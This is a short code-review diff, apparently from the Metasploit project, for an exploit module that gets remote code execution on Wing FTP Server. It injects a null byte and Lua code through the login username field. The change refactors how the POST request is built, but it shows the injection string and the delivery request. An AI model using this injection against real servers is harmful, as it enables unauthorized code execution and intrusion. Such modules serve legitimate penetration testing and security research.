Update modules/exploits/multi/http/wingftp_null_byte_rce.rb

Co-authored-by: Christophe De La Fuente <[email protected]>

Author: Chocapikk

modules/exploits/multi/http/wingftp_null_byte_rce.rb

@@ -115,21 +115,18 @@ def exploit
 
     inj = "#{user}%00" + Rex::Text.uri_encode(lua).gsub('%0a', '%0d') + '--'
 
-    post_data = [
-      "username=#{inj}",
-      "password=#{pass}",
-      "username_val=#{user}",
-      "password_val=#{pass}"
-    ].join('&')
-
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'loginok.html'),
       'headers' => {
-        'Content-Type' => 'application/x-www-form-urlencoded',
         'Referer' => normalize_uri(target_uri.path, 'login.html') + '?lang=english'
       },
-      'data' => post_data
+      'vars_post' => {
+        'username' => inj,
+        'password' => pass,
+        'username_val' => user,
+        'password_val' => pass
+      }
     )
     fail_with(Failure::UnexpectedReply, 'Injection failed') unless res&.code == 200